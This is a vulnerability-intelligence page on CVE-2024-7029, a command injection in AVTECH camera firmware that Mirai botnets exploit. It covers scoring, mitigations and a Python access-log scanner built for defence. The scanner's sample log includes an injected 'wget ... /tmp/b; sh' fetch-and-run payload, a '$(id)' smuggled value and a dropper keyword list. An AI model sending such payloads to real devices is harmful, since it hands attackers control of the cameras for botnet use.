Exploit
CVE-2024-7029

Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)

Published: Aug 2, 2024 / Updated: 3mo ago

CVSS 8.7 | EPSS 0.04% | Severity: High

Summary

Commands can be injected over the network and executed without authentication. This vulnerability is classified as a command injection issue (Improper Neutralization of Special Elements used in a Command). It affects products from the vendor AVTECH, specifically the AVM1203 firmware versions up to and including fullimg-1023-1007-1011-1009.

Impact

This vulnerability carries a CVSS v3.1 base score of 9.8 (Critical) and a CVSS v4.0 base score of 8.7 (High). Under the v3.1 vector the attack is network-reachable, low complexity, requires no privileges and no user interaction, and has high impact on confidentiality, integrity and availability. An attacker who can reach the camera's web interface executes arbitrary operating-system commands on the camera itself, which amounts to full control of the device: data theft, configuration or firmware tampering, denial of service and, as the references below describe, enrolment of the camera into a Mirai botnet. Note one discrepancy in the scoring data on this page: the v4.0 vector is scored with PR:L (low privileges) rather than PR:N, and the timeline records NVD assigning a base score of 8.8, which is exactly what the v3.1 vector yields with PR:L. Treat the lower figures as a disagreement about whether authentication is needed, not as a reduced impact; the summary and the references both state that no authentication is required.

Exploitation

Proof-of-concept exploits are public on akamai.com and github.com, and in-the-wild exploitation has been reported by several sources, including talkback.sh. The Mirai (Linux) malware family (source: #threatintel) is known to have weaponized this vulnerability; the Akamai report referenced below attributes the activity to a Corona Mirai variant that uses the command injection to spread to vulnerable cameras.

Patch

The vulnerability data on this page does not identify a fixed firmware version. The Akamai write-up referenced below describes the affected cameras as unpatchable, while the later threat-intelligence summary in the timeline says mitigations and patches are available, so the two sources disagree. Confirm directly with AVTECH whether a fixed build exists for AVM1203 firmware versions up to and including fullimg-1023-1007-1011-1009 before relying on either claim; if no fixed firmware exists, replacing the device is the only durable fix.

Mitigation

While awaiting a patch, consider the following mitigations:

1. Segment the network so that affected AVTECH cameras sit in their own VLAN with no route to the internet or to general user and server networks. Mirai-style payloads need outbound access to fetch their binaries and to reach command-and-control infrastructure, so egress filtering blunts a successful injection.
2. Use firewall rules or access control lists so that only trusted management hosts can reach the cameras' web interface; block all inbound access from the internet.
3. Monitor web-access logs and network traffic for requests to the cameras whose parameter values contain shell metacharacters (;, |, &, $(, backticks) or download commands, and for cameras initiating outbound downloads or connections they have no business making.
4. The injection point is in the web interface's brightness function, so the web management interface itself is the exposed surface: keep it off the internet and reachable only through a VPN or management jump host until a fix is confirmed.
5. Apply AVTECH security updates as soon as they become available.
6. Apply the principle of least privilege to every account and integration that interacts with the cameras.
7. If a firmware version newer than fullimg-1023-1007-1011-1009 is available and verified as unaffected, upgrade to it; if no fixed firmware exists, plan to replace the device.
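The check behind mitigation item 3, as an added example that is not part of this page or of any AVTECH or Akamai material: a scan of web-access log lines for command-injection attempts against a camera's settings endpoint. Only the fact that the injection point is a brightness-setting function comes from the references on this page; the endpoint path, the parameter names, the log lines and the addresses are constructed for the example, and the dropper keyword list reflects generic Mirai tradecraft rather than this CVE's exploit.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Common/combined access-log line: client IP, identity, user, [timestamp],
# "METHOD target HTTP/x", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters and command substitution; none of these belong in a setting value.
SHELL_META = re.compile(r"[;|&`\n<>]|\$\(|\$\{")

# Tokens typical of IoT botnet droppers (assumed generic Mirai tradecraft, not taken from
# this CVE's exploit): fetch a binary, make it executable, run it from a writable directory.
DROPPER_TOKENS = re.compile(r"\b(wget|curl|tftp|busybox|chmod|nohup)\b|/tmp/|/var/run/", re.I)

# Parameters that should only ever carry an integer. "brightness" is the injection point
# named in this page's references; the other two are assumed for illustration.
INTEGER_PARAMS = {"brightness", "contrast", "saturation"}


def query_params(target):
    """Split the request target's query into (name, value) pairs, splitting on '&' only.

    Some library query parsers have treated ';' as a separator as well, which would turn a
    ';'-delimited injected command into a separate, innocuous-looking parameter and hide it."""
    pairs = []
    for chunk in urlsplit(target).query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def inspect_request(line):
    """Return findings for one access-log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = m.group("target")
    findings = []
    for name, value in query_params(target):
        # Decode once more so a double-encoded payload (%2524 -> %24 -> $) is seen as the shell would.
        value = unquote(value)
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell metacharacters")
        if DROPPER_TOKENS.search(value):
            reasons.append("dropper-like tokens")
        if name.lower() in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
            reasons.append("non-numeric value for integer setting")
        if reasons:
            findings.append({
                "client": m.group("ip"),
                "time": m.group("ts"),
                "path": urlsplit(target).path,
                "param": name,
                "value": value,
                "reasons": reasons,
            })
    return findings


def scan_log(text):
    """Run inspect_request over every line of an access log and collect the findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(inspect_request(line))
    return findings


# Constructed sample log. The endpoint path and parameter layout are invented for the example;
# the client and payload addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Aug/2024:11:02:15 +0000] "GET /cgi-bin/camera_settings.cgi?action=set&brightness=50 HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Aug/2024:11:02:16 +0000] "GET /cgi-bin/camera_settings.cgi?action=set&brightness=50;wget%20http://203.0.113.5/bot.sh%20-O%20/tmp/b;sh%20/tmp/b HTTP/1.1" 200 17 "-" "-"
198.51.100.7 - - [02/Aug/2024:11:02:20 +0000] "GET /cgi-bin/camera_settings.cgi?action=set&brightness=%2524%2528id%2529 HTTP/1.1" 200 17 "-" "-"
192.0.2.11 - - [02/Aug/2024:11:03:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} {f['param']}={f['value']!r}: {', '.join(f['reasons'])}")
```

Two design points matter more than the regexes. The query is split on "&" by hand and each value is decoded a second time, because a parser that also splits on ";" or decodes only once will classify the injected command as a harmless extra parameter. And this only sees what the web server logs, so a payload in a POST body is invisible to it; pair it with the egress monitoring in items 1 and 3, since a compromised camera fetching a binary from an unknown host is the other half of the same event.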

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Timeline

First Article

Feedly found the first article mentioning CVE-2024-7029. See article

Aug 1, 2024 at 5:09 PM / CISA
CVSS Estimate

Feedly estimated the CVSS score as HIGH

Aug 1, 2024 at 5:13 PM
CVE Assignment

NVD published the first details for CVE-2024-7029

Aug 2, 2024 at 3:16 PM
CVSS

A CVSS base score of 8.8 has been assigned.

Aug 2, 2024 at 3:20 PM / nvd
Exploitation in the Wild

Attacks in the wild have been reported by Talkback News. See article

Aug 2, 2024 at 11:44 PM / Talkback News
EPSS

EPSS Score was set to: 0.04% (Percentile: 9.4%)

Aug 6, 2024 at 11:06 AM
Threat Intelligence Report

CVE-2024-7029 is a critical command injection vulnerability in AVTECH CCTV cameras, allowing for remote code execution. It has been actively exploited by botnets since at least December 2023, with a publicly available proof of concept since 2019. Mitigations and patches are available, but organizations should be vigilant as the vulnerability may impact other third-party vendors using similar technology. See article

Aug 28, 2024 at 5:40 PM
Attribution of Exploits

The vulnerability is known to be exploited by Mirai (Linux). See article

Aug 28, 2024 at 6:20 PM / #threatintel
Trending

This CVE started to trend in security discussions

Aug 29, 2024 at 1:44 PM
Static CVE Timeline Graph

Affected Systems

Avtech/avm1203_firmware

Exploits

https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt

Links to Malware Families

Mirai

Attack Patterns

CAPEC-136: LDAP Injection

References

New Mirai Variant Exploits Zero-Day in AVTECH Cameras: CVE-2024-7029
On August 28, 2024, the Akamai Security Intelligence and Response Team (SIRT) released a detailed report on a new botnet campaign that exploits a previously undisclosed zero-day vulnerability in AVTECH CCTV cameras. The exploit allows attackers to execute arbitrary commands remotely with elevated privileges, turning the affected cameras into nodes of a rapidly spreading botnet.
Beware the Unpatchable: Corona Mirai Botnet Spreads via Zero-Day
This RCE zero-day vulnerability was discovered in the brightness function of AVTECH IP camera devices and allows for a command injection to spread a Mirai variant on a target system. CVE-2024-7029 (discovered by Aline Eliovich) is a command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE).

News

Cyble reports surge in cyberattacks targeting critical infrastructure and open-source vulnerabilities
“New to the list are attacks on a vulnerability in the SPIP open-source content management (CMS) and publishing system, while previously reported campaigns targeting vulnerabilities in PHP, Linux systems, Java and Python frameworks, and more have continued unabated.” “As these vulnerabilities likely exist within some critical infrastructure environments, organizations with internet-facing IoT devices and embedded systems are advised to check for risk exposure and apply necessary mitigations,” the Cyble researchers noted in a recent blog post.
Cyberattacks On Spring & IoT Devices
Cyble vulnerability intelligence unit has shared a report, detailing the recent cyberattacks on the Spring Java framework and hundreds of thousands of Internet of Things (IoT) devices. By implementing these recommendations, businesses can enhance their defenses against the active threats identified in Cyble’s vulnerability intelligence report, particularly those targeting the Spring Java framework and IoT devices.
Cyble Sensors Uncover Cyberattacks on Java Framework and IoT Devices
Cyble vulnerability intelligence unit has shared a report, detailing the recent cyberattacks on the Spring Java framework and hundreds of thousands of Internet of Things (IoT) devices. By implementing these recommendations, businesses can enhance their defenses against the active threats identified in Cyble's vulnerability intelligence report, particularly those targeting the Spring Java framework and IoT devices.
Cyble Sensors Detect Attacks on Java Framework, IoT Devices
Cyble’s Vulnerability Intelligence unit also observed thousands of brute-force attacks and hundreds of phishing campaigns. Cyble sensors have detected attacks against other “Ripple20” vulnerabilities during this period—most notably CVE-2020-11900, an IPv4 tunneling Double Free vulnerability also present in the Treck TCP/IP stack before 6.0.1.41—so IoT environments that may contain these vulnerabilities should check for exposures and apply appropriate mitigations.

CVSS V3.1

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
